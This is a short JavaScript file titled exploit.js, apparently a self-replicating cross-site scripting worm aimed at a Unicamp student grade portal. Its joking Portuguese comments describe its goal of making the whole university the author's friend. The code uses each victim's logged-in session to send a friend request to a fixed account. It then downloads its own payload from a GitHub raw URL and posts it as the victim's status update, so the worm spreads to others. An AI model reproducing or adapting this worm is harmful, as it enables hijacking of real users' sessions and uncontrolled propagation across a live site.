exploit.js

/* Adicionando eu como amigo pois me sinto muito sozinho :( */
/* ASSIM TODA A UNICAMP SERÁ MINHA AMIGAAAAAAAA */
fetch('https://grade.daconline.unicamp.br/ajax/amigo.php', {
  credentials: 'include',
  headers: {
    accept: '*/*',
    'accept-language':
      'en-GB,en;q=0.9,en-US;q=0.8,de;q=0.7,pt-BR;q=0.6,pt;q=0.5',
    'cache-control': 'no-cache',
    'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
    pragma: 'no-cache',
    'sec-fetch-mode': 'cors',
    'sec-fetch-site': 'same-origin',
    'x-requested-with': 'XMLHttpRequest'
  },
  referrer: 'https://grade.daconline.unicamp.br/perfil/?aluno=236482',
  referrerPolicy: 'no-referrer-when-downgrade',
  body: 'i=37396&tipo=a',
  method: 'POST',
  mode: 'cors'
});

// Replicando código como um vírus
fetch(
  'https://raw.githubusercontent.com/NicolasCaous/unicampGDExss/master/bootstrap.html'
).then(c => {
  c.text().then(b => {
    fetch('https://grade.daconline.unicamp.br/ajax/acontecimento.php', {
      credentials: 'include',
      headers: {
        accept: '*/*',
        'accept-language':
          'en-GB,en;q=0.9,en-US;q=0.8,de;q=0.7,pt-BR;q=0.6,pt;q=0.5',
        'cache-control': 'no-cache',
        'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
        pragma: 'no-cache',
        'sec-fetch-mode': 'cors',
        'sec-fetch-site': 'same-origin',
        'x-requested-with': 'XMLHttpRequest'
      },
      referrer: 'https://grade.daconline.unicamp.br/',
      referrerPolicy: 'no-referrer-when-downgrade',
      body: 'tp=us&txt=' + encodeURI(b),
      method: 'POST',
      mode: 'cors'
    });
  });
});